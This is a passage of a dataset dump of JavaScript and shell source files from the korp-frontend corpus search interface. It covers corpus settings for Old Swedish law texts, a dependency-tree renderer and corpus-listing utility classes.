145`,\n `Yngre Västmannalagen, enl Holm B 57`,\n `Vidhemsprästens anteckningar`,\n `Magnus Erikssons Stadslag, exklusiva stadslagsflockar`,\n `Södermannalagens additamenta, efter NKS 2237`,\n `Hälsingelagen`,\n `Yngre Västgötalagen, tillägg, enligt Holm B 58`,\n `Östgötalagen, fragment C, ur Holm B 1709`,\n `Yngre Västgötalagen, enligt Holm B 58`,\n `Upplandslagen enl Schlyters utgåva och Codex Ups C 12, hskr A`,\n `Skånelagen, enligt Holm B 76`,\n `Östgötalagen, fragment D, ur Holm B 24`,\n `Östgötalagen A, ur Holm B 50`,\n `Äldre Västgötalagen`,\n `Östgötalagen, fragment M, ur Holm B 196`,\n `Gutalagen enligt Holm B 64`,\n `Upplandslagen enligt Codex Holm B 199, Schlyters hskr B`,\n `Smålandslagens kyrkobalk`,\n `Dalalagen (Äldre Västmannalagen)`,\n `Gutalagens additamenta enligt AM 54`,\n `Bjärköarätten`,\n `Magnus Erikssons Landslag`,\n `Östgötalagen, fragment N, ur Köpenhamn AM 1056`,\n `Södermannalagen stadsfästelse - Confirmatio, enligt NKS 2237`,\n `Östgötalagen, fragment E, ur Ups B 22`,\n ],\n },\n text_date: { label: `date` },\n },\n};\n\nsettings.commonStructTypes = {\n date_interval: {\n label: `date_interval`,\n hideSidebar: `true`,\n hideCompare: `true`,\n hideStatistics: `true`,\n opts: false,\n extendedTemplate: `<div class=\"date_interval_arg_type\"> <div class=\"section\"> <button class=\"btn btn-default btn-sm\" popper no-close-on-click my=\"left top\" at=\"right top\"> <i class=\"fa fa-calendar\"></i> Från </button> {{combined.format(\"YYYY-MM-DD HH:mm\")}} <time-interval ng-click=\"from_click($event)\" class=\"date_interval popper_menu dropdown-menu\" date-model=\"from_date\" time-model=\"from_time\" model=\"combined\" min-date=\"minDate\" max-date=\"maxDate\"> </time-interval> </div> <div class=\"section\"> <button class=\"btn btn-default btn-sm\" popper no-close-on-click my=\"left top\" at=\"right top\"> <i class=\"fa fa-calendar\"></i> Till </button> {{combined2.format(\"YYYY-MM-DD HH:mm\")}} <time-interval ng-click=\"from_click($event)\" class=\"date_interval popper_menu dropdown-menu\" date-model=\"to_date\" time-model=\"to_time\" model=\"combined2\" my=\"left top\" at=\"right top\" min-date=\"minDate\" max-date=\"maxDate\"> </time-interval> </div> </div>`,\n extendedController: [\n `$scope`, `searches`, `$timeout`, function($scope, searches, $timeout) {\n var cl, getTime, getYear, ref, ref1, ref2, s, updateIntervals;\n s = $scope;\n cl = settings.corpusListing;\n\n updateIntervals = function() {\n var from, moments, ref, ref1, to;\n moments = cl.getMomentInterval();\n if (moments.length) {\n return ref = _.invokeMap(moments, `toDate`), s.minDate = ref[0], s.maxDate = ref[1], ref;\n } else {\n ref1 = cl.getTimeInterval(), from = ref1[0], to = ref1[1];\n s.minDate = moment(from.toString(), `YYYY`).toDate();\n return s.maxDate = moment(to.toString(), `YYYY`).toDate();\n }\n };\n\n s.$on(`corpuschooserchange`, function() {\n return updateIntervals();\n });\n\n updateIntervals();\n\n s.from_click = function(event) {\n event.originalEvent.preventDefault();\n return event.originalEvent.stopPropagation();\n };\n\n getYear = function(val) {\n return moment(val.toString(), `YYYYMMDD`).toDate();\n };\n\n getTime = function(val) {\n return moment(val.toString(), `HHmmss`).toDate();\n };\n\n if (!s.model) {\n s.from_date = s.minDate;\n s.to_date = s.maxDate;\n ref = _.invokeMap(cl.getMomentInterval(), `toDate`), s.from_time = ref[0], s.to_time = ref[1];\n } else if (s.model.length === 4) {\n ref1 = _.map(s.model.slice(0, 3), getYear), s.from_date = ref1[0], s.to_date = ref1[1];\n ref2 = _.map(s.model.slice(2), getTime), s.from_time = ref2[0], s.to_time = ref2[1];\n }\n return s.$watchGroup([`combined`, `combined2`], function(arg) {\n var combined, combined2;\n combined = arg[0], combined2 = arg[1];\n return s.model = [moment(s.from_date).format(`YYYYMMDD`), moment(s.to_date).format(`YYYYMMDD`), moment(s.from_time).format(`HHmmss`), moment(s.to_time).format(`HHmmss`)];\n });\n },\n ],\n },\n};\n\nmodule.exports = {\n spWithin,\n spContext,\n modernAttrs,\n modernAttrs2,\n defaultContext,\n attrs,\n sattrs,\n modernAttrsOld,\n setOptions,\n liteOptions,\n lexClassesText,\n readability,\n fsv_aldrelagar,\n fsv_yngrelagar,\n};\n"
},
{
"alpha_fraction": 0.49135446548461914,
"alphanum_fraction": 0.5012350678443909,
"avg_line_length": 27.08092498779297,
"blob_id": "3a7ca3cea6f05e0250f8ba80abb7c85206c7a709",
"content_id": "4fea75df302b2b0934290cb2bdab8e72b5b502bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4858,
"license_type": "permissive",
"max_line_length": 169,
"num_lines": 173,
"path": "/app/lib/deptrees/js/deptrees.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "// Generated by CoffeeScript 1.4.0\n(function() {\n var color_from_chars, draw_brat_tree, isNumber, make_entity_from_pos, make_relation_from_rel, webFontURLs;\n\n window.draw_deptree = function(sent, hover_fun) {\n var deprel_div, sent_id;\n if (hover_fun == null) {\n hover_fun = function() {};\n }\n sent_id = \"magic_secret_id\";\n deprel_div = $(\"<div>\").attr(\"id\", sent_id);\n $('body').empty().append(deprel_div);\n return draw_brat_tree(sent, sent_id, hover_fun);\n };\n\n window.sentence_xml_to_json = function(sent) {\n return _.map($(sent).children(), function(word) {\n var obj;\n obj = {\n word: word.textContent\n };\n _.map([\"pos\", \"ref\", \"dephead\", \"deprel\"], function(attr) {\n return obj[attr] = $(word).attr(attr);\n });\n return obj;\n });\n };\n\n $(document).ready(head.js);\n\n webFontURLs = [\"lib/brat/static/fonts/Astloch-Bold.ttf\", \"lib/brat/static/fonts/PT_Sans-Caption-Web-Regular.ttf\", \"lib/brat/static/fonts/Liberation_Sans-Regular.ttf\"];\n\n color_from_chars = function(w, sat_min, sat_max, lightness) {\n var color, hue, i, len, sat, v;\n v = 1.0;\n hue = 0.0;\n sat = 0.0;\n len = w.length;\n i = 0;\n while (i < len) {\n v = v / 26.0;\n sat += ((w.charCodeAt(i)) % 26) * v;\n hue += ((w.charCodeAt(i)) % 26) * (1.0 / 26 / len);\n i++;\n }\n hue = hue * 360;\n sat = sat * (sat_max - sat_min) + sat_min;\n color = $.Color({\n hue: hue,\n saturation: sat,\n lightness: lightness\n });\n return color.toHexString(0);\n };\n\n make_entity_from_pos = function(p) {\n return {\n type: p,\n labels: [p],\n bgColor: color_from_chars(p, 0.8, 0.95, 0.95),\n borderColor: \"darken\"\n };\n };\n\n make_relation_from_rel = function(r) {\n return {\n type: r,\n labels: [r],\n color: \"#000000\",\n args: [\n {\n role: \"parent\",\n targets: []\n }, {\n role: \"child\",\n targets: []\n }\n ]\n };\n };\n\n isNumber = function(n) {\n return (!isNaN(parseFloat(n))) && isFinite(n);\n };\n\n draw_brat_tree = function(words, to_div, hover_fun) {\n var add_word, added_pos, added_rel, collData, docData, entities, entity_types, ix, len, relation_types, relations, text, word, _i, _len;\n entity_types = [];\n relation_types = [];\n entities = [];\n relations = [];\n added_pos = [];\n added_rel = [];\n add_word = function(word, start, stop) {\n var attr, dephead, deprel, entity, pos, ref, relation, _ref;\n _ref = (function() {\n var _i, _len, _ref, _results;\n _ref = [\"pos\", \"ref\", \"dephead\", \"deprel\"];\n _results = [];\n for (_i = 0, _len = _ref.length; _i < _len; _i++) {\n attr = _ref[_i];\n _results.push(word[attr]);\n }\n return _results;\n })(), pos = _ref[0], ref = _ref[1], dephead = _ref[2], deprel = _ref[3];\n if (!_.contains(added_pos, pos)) {\n added_pos.push(pos);\n entity_types.push(make_entity_from_pos(pos));\n }\n if (!_.contains(added_rel, deprel)) {\n added_rel.push(deprel);\n relation_types.push(make_relation_from_rel(deprel));\n }\n entity = [\"T\" + ref, pos, [[start, stop]]];\n entities.push(entity);\n if (isNumber(dephead)) {\n relation = [\"R\" + ref, deprel, [[\"parent\", \"T\" + dephead], [\"child\", \"T\" + ref]]];\n return relations.push(relation);\n }\n };\n text = ((function() {\n var _i, _len, _results;\n _results = [];\n for (_i = 0, _len = words.length; _i < _len; _i++) {\n word = words[_i];\n _results.push(word.word);\n }\n return _results;\n })()).join(\" \");\n ix = 0;\n for (_i = 0, _len = words.length; _i < _len; _i++) {\n word = words[_i];\n len = word.word.length;\n add_word(word, ix, ix + len);\n ix += len + 1;\n }\n collData = {\n entity_types: entity_types,\n relation_types: relation_types\n };\n docData = {\n text: text,\n entities: entities,\n relations: relations\n };\n return head.ready(function() {\n var dispatcher, div;\n dispatcher = Util.embed(to_div, collData, docData, webFontURLs);\n div = $(\"#\" + to_div);\n return dispatcher.on('doneRendering', function() {\n _.map(div.find(\"g.arcs\").children(), function(g) {\n var deprel;\n deprel = $(g).find(\"text\").data(\"arc-role\");\n return $(g).hover(function() {\n return hover_fun({\n deprel: deprel\n });\n });\n });\n return _.map(div.find(\"g.span text\"), function(g) {\n var pos;\n pos = $(g).text();\n return $(g).parent().hover(function() {\n return hover_fun({\n pos: pos\n });\n });\n });\n });\n });\n };\n\n}).call(this);\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.7333333492279053,
"avg_line_length": 18.66666603088379,
"blob_id": "d25dd1bd117c0126553e024d361e5b86d12145c3",
"content_id": "3dfc7a83ccfa6d1203a89b3fe8f3d100a0e3825f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 60,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 3,
"path": "/doc/rebuild.sh",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\npandoc -o frontend_devel.html frontend_devel.md\n\n"
},
{
"alpha_fraction": 0.5229880809783936,
"alphanum_fraction": 0.5276082754135132,
"avg_line_length": 32.215179443359375,
"blob_id": "61560f7af8e8691a4bcd237e5e25f75a255d52da",
"content_id": "6abf39ed29d72d82b85370193ab14e1fe0c1f727",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 39844,
"license_type": "permissive",
"max_line_length": 228,
"num_lines": 1199,
"path": "/app/scripts/util.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst folderImg = require(\"../img/folder.png\")\nconst korpIconImg = require(\"../img/korp_icon.png\")\nconst jRejectBackgroundImg = require(\"../img/browsers/background_browser.gif\")\nrequire(\"../img/browsers/browser_chrome.gif\")\nrequire(\"../img/browsers/browser_firefox.gif\")\nrequire(\"../img/browsers/browser_safari.gif\")\nrequire(\"../img/browsers/browser_opera.gif\")\n\nwindow.util = {}\n\nwindow.CorpusListing = class CorpusListing {\n constructor(corpora) {\n this.struct = corpora\n this.corpora = _.values(corpora)\n this.selected = _.filter(this.corpora, (corp) => !corp.limitedAccess)\n }\n\n get(key) {\n return this.struct[key]\n }\n\n list() {\n return this.corpora\n }\n\n map(func) {\n return _.map(this.corpora, func)\n }\n\n subsetFactory(idArray) {\n // returns a new CorpusListing instance from an id subset.\n idArray = _.invokeMap(idArray, \"toLowerCase\")\n const cl = new CorpusListing(_.pick(this.struct, ...idArray))\n cl.selected = cl.corpora\n return cl\n }\n\n // only applicable for parallel corpora\n getReduceLang() {}\n\n // Returns an array of all the selected corpora's IDs in uppercase\n getSelectedCorpora() {\n return corpusChooserInstance.corpusChooser(\"selectedItems\")\n }\n\n select(idArray) {\n this.selected = _.values(_.pick.apply(this, [this.struct].concat(idArray)))\n }\n\n mapSelectedCorpora(f) {\n return _.map(this.selected, f)\n }\n\n // takes an array of mapping objs and returns their intersection\n _mapping_intersection(mappingArray) {\n return _.reduce(\n mappingArray,\n function (a, b) {\n const keys_intersect = _.intersection(_.keys(a), _.keys(b))\n const to_mergea = _.pick(a, ...keys_intersect)\n const to_mergeb = _.pick(b, ...keys_intersect)\n return _.merge({}, to_mergea, to_mergeb)\n } || {}\n )\n }\n\n _mapping_union(mappingArray) {\n return _.reduce(mappingArray, (a, b) => _.merge(a, b), {})\n }\n\n getCurrentAttributes(lang) {\n // lang not used here, only in parallel mode\n const attrs = this.mapSelectedCorpora((corpus) => corpus.attributes)\n return this._invalidateAttrs(attrs)\n }\n\n getCurrentAttributesIntersection() {\n const attrs = this.mapSelectedCorpora((corpus) => corpus.attributes)\n\n return this._mapping_intersection(attrs)\n }\n\n getStructAttrsIntersection() {\n const attrs = this.mapSelectedCorpora(function (corpus) {\n for (let key in corpus.structAttributes) {\n const value = corpus.structAttributes[key]\n value[\"isStructAttr\"] = true\n }\n\n return corpus.structAttributes\n })\n return this._mapping_intersection(attrs)\n }\n\n getStructAttrs() {\n const attrs = this.mapSelectedCorpora(function (corpus) {\n for (let key in corpus.structAttributes) {\n const value = corpus.structAttributes[key]\n value[\"isStructAttr\"] = true\n }\n\n // if a position attribute is declared as structural, include here\n const pos_attrs = _.pickBy(corpus.attributes, (val, key) => {\n return val.isStructAttr\n })\n return _.extend({}, pos_attrs, corpus.structAttributes)\n })\n const rest = this._invalidateAttrs(attrs)\n\n // TODO this code merges datasets from attributes with the same name and\n // should be moved to the code for extended controller \"datasetSelect\"\n const withDataset = _.filter(_.toPairs(rest), (item) => item[1].dataset)\n $.each(withDataset, function (i, item) {\n const key = item[0]\n const val = item[1]\n return $.each(attrs, function (j, origStruct) {\n if (origStruct[key] && origStruct[key].dataset) {\n let ds = origStruct[key].dataset\n if ($.isArray(ds)) {\n ds = _.zipObject(ds, ds)\n }\n\n if (_.isArray(val.dataset)) {\n val.dataset = _.zipObject(val.dataset, val.dataset)\n }\n return $.extend(val.dataset, ds)\n }\n })\n })\n\n return $.extend(rest, _.fromPairs(withDataset))\n }\n // End TODO\n\n getDefaultFilters() {\n return this._getFilters(\"intersection\", \"defaultFilters\")\n }\n\n getCurrentFilters() {\n return this._getFilters(settings.filterSelection, \"showFilters\")\n }\n\n _getFilters(selection, filterType) {\n let attrNames = []\n let attrs = {}\n\n for (let corpus of this.selected) {\n if (filterType in corpus) {\n for (let filter of corpus[filterType]) {\n if (!attrNames.includes(filter)) {\n attrNames.push(filter)\n }\n if (!(filter in attrs)) {\n attrs[filter] = {\n settings: corpus.structAttributes[filter],\n corpora: [corpus.id],\n }\n } else {\n attrs[filter].corpora.push(corpus.id)\n }\n }\n }\n }\n\n if (selection === \"intersection\") {\n const attrNames2 = []\n const attrs2 = {}\n const corpusCount = this.selected.length\n for (let attr of attrNames) {\n if (attrs[attr].corpora.length === corpusCount) {\n attrNames2.push(attr)\n attrs2[attr] = attrs[attr]\n }\n }\n attrNames = attrNames2\n attrs = attrs2\n }\n\n return [attrNames, attrs]\n }\n\n _invalidateAttrs(attrs) {\n const union = this._mapping_union(attrs)\n const intersection = this._mapping_intersection(attrs)\n $.each(union, function (key, value) {\n if (intersection[key] == null) {\n value[\"disabled\"] = true\n } else {\n return delete value[\"disabled\"]\n }\n })\n\n return union\n }\n\n // returns true if coprus has all attrs, else false\n corpusHasAttrs(corpus, attrs) {\n for (let attr of attrs) {\n if (\n attr !== \"word\" &&\n !(\n attr in\n $.extend(\n {},\n this.struct[corpus].attributes,\n this.struct[corpus].structAttributes\n )\n )\n ) {\n return false\n }\n }\n return true\n }\n\n stringifySelected() {\n return _.map(this.selected, \"id\")\n .map((a) => a.toUpperCase())\n .join(\",\")\n }\n\n stringifyAll() {\n return _.map(this.corpora, \"id\")\n .map((a) => a.toUpperCase())\n .join(\",\")\n }\n\n getWithinKeys() {\n const struct = _.map(this.selected, (corpus) => _.keys(corpus.within))\n return _.union(...(struct || []))\n }\n\n getContextQueryStringFromCorpusId(corpus_ids, prefer, avoid) {\n const corpora = _.map(corpus_ids, (corpus_id) => settings.corpora[corpus_id.toLowerCase()])\n return this.getContextQueryStringFromCorpora(_.compact(corpora), prefer, avoid)\n }\n\n getContextQueryString(prefer, avoid) {\n return this.getContextQueryStringFromCorpora(this.selected, prefer, avoid)\n }\n\n getContextQueryStringFromCorpora(corpora, prefer, avoid) {\n const output = []\n for (let corpus of corpora) {\n const contexts = _.keys(corpus.context)\n if (!contexts.includes(prefer)) {\n if (contexts.length > 1 && contexts.includes(avoid)) {\n contexts.splice(contexts.indexOf(avoid), 1)\n }\n output.push(corpus.id.toUpperCase() + \":\" + contexts[0])\n }\n }\n return _(output).compact().join()\n }\n\n getWithinParameters() {\n const defaultWithin = locationSearch().within || _.keys(settings.defaultWithin)[0]\n\n const output = []\n for (let corpus of this.selected) {\n const withins = _.keys(corpus.within)\n if (!withins.includes(defaultWithin)) {\n output.push(corpus.id.toUpperCase() + \":\" + withins[0])\n }\n }\n const within = _(output).compact().join()\n return { default_within: defaultWithin, within }\n }\n\n getTimeInterval() {\n const all = _(this.selected)\n .map(\"time\")\n .filter((item) => item != null)\n .map(_.keys)\n .flatten()\n .map(Number)\n .sort((a, b) => a - b)\n .value()\n\n return [_.first(all), _.last(all)]\n }\n\n getMomentInterval() {\n let from, to\n const toUnix = (item) => item.unix()\n\n const infoGetter = (prop) => {\n return _(this.selected)\n .map(\"info\")\n .map(prop)\n .compact()\n .map((item) => moment(item))\n .value()\n }\n\n const froms = infoGetter(\"FirstDate\")\n const tos = infoGetter(\"LastDate\")\n\n if (!froms.length) {\n from = null\n } else {\n from = _.minBy(froms, toUnix)\n }\n if (!tos.length) {\n to = null\n } else {\n to = _.maxBy(tos, toUnix)\n }\n\n return [from, to]\n }\n\n getNonProtected() {\n return _.filter(this.corpora, (item) => !item.limitedAccess)\n }\n\n getTitle(corpus) {\n try {\n return this.struct[corpus].title\n } catch (e) {\n return c.log(\"gettitle broken\", corpus)\n }\n }\n\n getWordGroup(withCaseInsentive) {\n const word = {\n group: \"word\",\n value: \"word\",\n label: \"word\",\n }\n if (withCaseInsentive) {\n const wordInsensitive = {\n group: \"word\",\n value: \"word_insensitive\",\n label: \"word_insensitive\",\n }\n return [word, wordInsensitive]\n } else {\n return [word]\n }\n }\n\n getWordAttributeGroups(lang, setOperator) {\n let allAttrs\n if (setOperator === \"union\") {\n allAttrs = this.getCurrentAttributes(lang)\n } else {\n allAttrs = this.getCurrentAttributesIntersection()\n }\n\n const attrs = []\n for (let key in allAttrs) {\n const obj = allAttrs[key]\n if (obj.displayType !== \"hidden\") {\n attrs.push(_.extend({ group: \"word_attr\", value: key }, obj))\n }\n }\n return attrs\n }\n\n getStructAttributeGroups(lang, setOperator) {\n let allAttrs\n if (setOperator === \"union\") {\n allAttrs = this.getStructAttrs(lang)\n } else {\n allAttrs = this.getStructAttrsIntersection(lang)\n }\n\n const common_keys = _.compact(\n _.flatten(_.map(this.selected, (corp) => _.keys(corp.common_attributes)))\n )\n const common = _.pick(settings.commonStructTypes, ...common_keys)\n\n let sentAttrs = []\n const object = _.extend({}, common, allAttrs)\n for (let key in object) {\n const obj = object[key]\n if (obj.displayType !== \"hidden\") {\n sentAttrs.push(_.extend({ group: \"sentence_attr\", value: key }, obj))\n }\n }\n\n sentAttrs = _.sortBy(sentAttrs, (item) => util.getLocaleString(item.label))\n\n return sentAttrs\n }\n\n getAttributeGroups(lang) {\n const words = this.getWordGroup(false)\n const attrs = this.getWordAttributeGroups(lang, \"union\")\n const sentAttrs = this.getStructAttributeGroups(lang, \"union\")\n return words.concat(attrs, sentAttrs)\n }\n\n getStatsAttributeGroups(lang) {\n const words = this.getWordGroup(true)\n\n const wordOp = settings.reduceWordAttributeSelector || \"union\"\n const attrs = this.getWordAttributeGroups(lang, wordOp)\n\n const structOp = settings.reduceStructAttributeSelector || \"union\"\n const sentAttrs = this.getStructAttributeGroups(lang, structOp)\n\n return words.concat(attrs, sentAttrs)\n }\n}\n\nwindow.ParallelCorpusListing = class ParallelCorpusListing extends CorpusListing {\n constructor(corpora, activeLangs) {\n super(corpora)\n this.setActiveLangs(activeLangs)\n }\n\n select(idArray) {\n this.selected = []\n $.each(idArray, (i, id) => {\n const corp = this.struct[id]\n this.selected = this.selected.concat(this.getLinked(corp, true, false))\n })\n\n this.selected = _.uniq(this.selected)\n }\n\n setActiveLangs(langlist) {\n this.activeLangs = langlist\n }\n\n getReduceLang() {\n return this.activeLangs[0]\n }\n\n getCurrentAttributes(lang) {\n const corpora = _.filter(this.selected, (item) => item.lang === lang)\n const struct = _.reduce(corpora, (a, b) => $.extend({}, a.attributes, b.attributes), {})\n return struct\n }\n\n getStructAttrs(lang) {\n const corpora = _.filter(this.selected, (item) => item.lang === lang)\n const struct = _.reduce(\n corpora,\n (a, b) => $.extend({}, a.structAttributes, b.structAttributes),\n {}\n )\n $.each(struct, (key, val) => (val[\"isStructAttr\"] = true))\n\n return struct\n }\n\n getStructAttrsIntersection(lang) {\n const corpora = _.filter(this.selected, (item) => item.lang === lang)\n const attrs = _.map(corpora, function (corpus) {\n for (let key in corpus.structAttributes) {\n const value = corpus.structAttributes[key]\n value[\"isStructAttr\"] = true\n }\n\n return corpus.structAttributes\n })\n return this._mapping_intersection(attrs)\n }\n\n getLinked(corp, andSelf, only_selected) {\n if (andSelf == null) {\n andSelf = false\n }\n if (only_selected == null) {\n only_selected = true\n }\n const target = only_selected ? this.selected : this.struct\n let output = _.filter(target, (item) => (corp.linkedTo || []).includes(item.id))\n if (andSelf) {\n output = [corp].concat(output)\n }\n return output\n }\n\n getEnabledByLang(lang, andSelf, flatten) {\n if (andSelf == null) {\n andSelf = false\n }\n if (flatten == null) {\n flatten = true\n }\n const corps = _.filter(this.selected, (item) => item[\"lang\"] === lang)\n const output = _(corps)\n .map((item) => {\n return this.getLinked(item, andSelf)\n })\n .value()\n\n if (flatten) {\n return _.flatten(output)\n } else {\n return output\n }\n }\n\n getLinksFromLangs(activeLangs) {\n if (activeLangs.length === 1) {\n return this.getEnabledByLang(activeLangs[0], true, false)\n }\n // get the languages that are enabled given a list of active languages\n const main = _.filter(this.selected, (corp) => corp.lang === activeLangs[0])\n\n let output = []\n for (var lang of activeLangs.slice(1)) {\n const other = _.filter(this.selected, (corp) => corp.lang === lang)\n\n for (var cps of other) {\n const linked = _(main)\n .filter((mainCorpus) => mainCorpus.linkedTo.includes(cps.id))\n .value()\n\n output = output.concat(_.map(linked, (item) => [item, cps]))\n }\n }\n\n return output\n }\n\n getAttributeQuery(attr) {\n // gets the within and context queries\n\n const struct = this.getLinksFromLangs(this.activeLangs)\n const output = []\n $.each(struct, function (i, corps) {\n const mainId = corps[0].id.toUpperCase()\n const mainIsPivot = !!corps[0].pivot\n\n const other = corps.slice(1)\n\n const pair = _.map(other, function (corp) {\n let a\n if (mainIsPivot) {\n a = _.keys(corp[attr])[0]\n } else {\n a = _.keys(corps[0][attr])[0]\n }\n return mainId + \"|\" + corp.id.toUpperCase() + \":\" + a\n })\n return output.push(pair)\n })\n\n return output.join(\",\")\n }\n\n getContextQueryString() {\n return this.getAttributeQuery(\"context\")\n }\n\n getWithinParameters() {\n const defaultWithin = locationSearch().within || _.keys(settings.defaultWithin)[0]\n const within = this.getAttributeQuery(\"within\")\n return { default_within: defaultWithin, within }\n }\n\n stringifySelected(onlyMain) {\n let struct = this.getLinksFromLangs(this.activeLangs)\n if (onlyMain) {\n struct = _.map(struct, (pair) => {\n return _.filter(pair, (item) => {\n return item.lang === this.activeLangs[0]\n })\n })\n\n return _.map(_.flatten(struct), \"id\")\n .map((a) => a.toUpperCase())\n .join(\",\")\n }\n\n const output = []\n // $.each(struct, function(i, item) {\n for (let i = 0; i < struct.length; i++) {\n const item = struct[i]\n var main = item[0]\n\n const pair = _.map(\n item.slice(1),\n (corp) => main.id.toUpperCase() + \"|\" + corp.id.toUpperCase()\n )\n\n output.push(pair)\n }\n return output.join(\",\")\n }\n\n get(corpusID) {\n return this.struct[corpusID.split(\"|\")[1]]\n }\n\n getTitle(corpusID) {\n return this.struct[corpusID.split(\"|\")[1]].title\n }\n}\n\n// TODO never use this, remove when sure it is not used\nwindow.search = (obj, val) => window.locationSearch(obj, val)\n\nwindow.locationSearch = function (obj, val) {\n const s = angular.element(\"body\").scope()\n\n const ret = safeApply(s.$root, function () {\n if (!obj) {\n return s.$root.locationSearch()\n }\n if (_.isObject(obj)) {\n obj = _.extend({}, s.$root.locationSearch(), obj)\n return s.$root.locationSearch(obj)\n } else {\n return s.$root.locationSearch(obj, val)\n }\n })\n\n if (val === null) {\n window.onHashChange()\n }\n return ret\n}\n\nwindow.initLocales = function () {\n const packages = [\"locale\", \"corpora\"]\n const prefix = \"translations\"\n const defs = []\n let loc_data = {}\n window.loc_data = loc_data\n const def = $.Deferred()\n for (let lang of settings.languages) {\n loc_data[lang] = {}\n for (let pkg of packages) {\n ;(function (lang, pkg) {\n let file = pkg + \"-\" + lang + \".json\"\n file = prefix + \"/\" + file\n return defs.push(\n $.ajax({\n url: file,\n dataType: \"json\",\n cache: false,\n success(data) {\n return _.extend(loc_data[lang], data)\n },\n })\n )\n })(lang, pkg)\n }\n }\n\n $.when.apply($, defs).then(() => def.resolve(loc_data))\n\n return def\n}\n\nwindow.safeApply = function (scope, fn) {\n if (scope.$$phase || scope.$root.$$phase) {\n return fn(scope)\n } else {\n return scope.$apply(fn)\n }\n}\n\nwindow.util.setLogin = function () {\n for (let corp of authenticationProxy.loginObj.credentials) {\n $(`#hpcorpus_${corp.toLowerCase()}`).closest(\".boxdiv.disabled\").removeClass(\"disabled\")\n }\n if (window.corpusChooserInstance) {\n window.corpusChooserInstance.corpusChooser(\"updateAllStates\")\n }\n $(\".err_msg\", self).hide()\n}\n\nutil.SelectionManager = function () {\n this.selected = $()\n this.aux = $()\n}\n\nutil.SelectionManager.prototype.select = function (word, aux) {\n if (word == null || !word.length) {\n return\n }\n if (this.selected.length) {\n this.selected.removeClass(\"word_selected token_selected\")\n this.aux.removeClass(\"word_selected aux_selected\")\n }\n this.selected = word\n this.aux = aux || $()\n this.aux.addClass(\"word_selected aux_selected\")\n word.addClass(\"word_selected token_selected\")\n}\n\nutil.SelectionManager.prototype.deselect = function () {\n if (!this.selected.length) {\n return\n }\n this.selected.removeClass(\"word_selected token_selected\")\n this.selected = $()\n this.aux.removeClass(\"word_selected aux_selected\")\n this.aux = $()\n}\n\nutil.SelectionManager.prototype.hasSelected = function () {\n return this.selected.length > 0\n}\n\nutil.getLocaleString = (key, lang) => util.getLocaleStringUndefined(key, lang) || key\n\nutil.getLocaleStringUndefined = function (key, lang) {\n if (!lang) {\n lang = window.lang || settings.defaultLanguage || \"sv\"\n }\n try {\n return window.loc_data[lang][key]\n } catch (e) {\n return undefined\n }\n}\n\nutil.localize = function (root) {\n root = root || \"body\"\n $(root).localize()\n}\n\nutil.lemgramToString = function (lemgram, appendIndex) {\n lemgram = _.trim(lemgram)\n let infixIndex = \"\"\n let concept = lemgram\n infixIndex = \"\"\n let type = \"\"\n if (util.isLemgramId(lemgram)) {\n const match = util.splitLemgram(lemgram)\n if (appendIndex != null && match.index !== \"1\") {\n infixIndex = $.format(\"<sup>%s</sup>\", match.index)\n }\n concept = match.form.replace(/_/g, \" \")\n type = match.pos.slice(0, 2)\n }\n return $.format(\n \"%s%s <span class='wordclass_suffix'>(<span rel='localize[%s]'>%s</span>)</span>\",\n [concept, infixIndex, type, util.getLocaleString(type)]\n )\n}\n\nutil.saldoRegExp = /(.*?)\\.\\.(\\d\\d?)(:\\d+)?$/\nutil.saldoToString = function (saldoId, appendIndex) {\n const match = saldoId.match(util.saldoRegExp)\n let infixIndex = \"\"\n if (appendIndex != null && match[2] !== \"1\") {\n infixIndex = $.format(\"<sup>%s</sup>\", match[2])\n }\n return $.format(\"%s%s\", [match[1].replace(/_/g, \" \"), infixIndex])\n}\n\nutil.saldoToPlaceholderString = function (saldoId, appendIndex) {\n const match = saldoId.match(util.saldoRegExp)\n let infixIndex = \"\"\n if (appendIndex != null && match[2] !== \"1\") {\n infixIndex = $.format(\" (%s)\", match[2])\n }\n return $.format(\"%s%s\", [match[1].replace(/_/g, \" \"), infixIndex])\n}\n\nutil.lemgramRegexp = /\\.\\.\\w+\\.\\d\\d?(:\\d+)?$/\nutil.isLemgramId = (lemgram) => lemgram.search(util.lemgramRegexp) !== -1\n\nutil.splitLemgram = function (lemgram) {\n if (!util.isLemgramId(lemgram)) {\n throw new Error(`Input to util.splitLemgram is not a lemgram: ${lemgram}`)\n }\n const keys = [\"morph\", \"form\", \"pos\", \"index\", \"startIndex\"]\n const splitArray = lemgram.match(/((\\w+)--)?(.*?)\\.\\.(\\w+)\\.(\\d\\d?)(:\\d+)?$/).slice(2)\n return _.zipObject(keys, splitArray)\n}\n\n// Add download links for other formats, defined in\n// settings.downloadFormats (Jyrki Niemi <[email protected]>\n// 2014-02-26/04-30)\n\nutil.setDownloadLinks = function (xhr_settings, result_data) {\n // If some of the required parameters are null, return without\n // adding the download links.\n if (\n !(\n xhr_settings != null &&\n result_data != null &&\n result_data.corpus_order != null &&\n result_data.kwic != null\n )\n ) {\n c.log(\"failed to do setDownloadLinks\")\n return\n }\n\n if (result_data.hits === 0) {\n $(\"#download-links\").hide()\n return\n }\n\n $(\"#download-links\").show()\n\n // Get the number (index) of the corpus of the query result hit\n // number hit_num in the corpus order information of the query\n // result.\n const get_corpus_num = (hit_num) =>\n result_data.corpus_order.indexOf(result_data.kwic[hit_num].corpus)\n\n c.log(\"setDownloadLinks data:\", result_data)\n $(\"#download-links\").empty()\n // Corpora in the query result\n const result_corpora = result_data.corpus_order.slice(\n get_corpus_num(0),\n get_corpus_num(result_data.kwic.length - 1) + 1\n )\n // Settings of the corpora in the result, to be passed to the\n // download script\n const result_corpora_settings = {}\n let i = 0\n while (i < result_corpora.length) {\n const corpus_ids = result_corpora[i].toLowerCase().split(\"|\")\n let j = 0\n while (j < 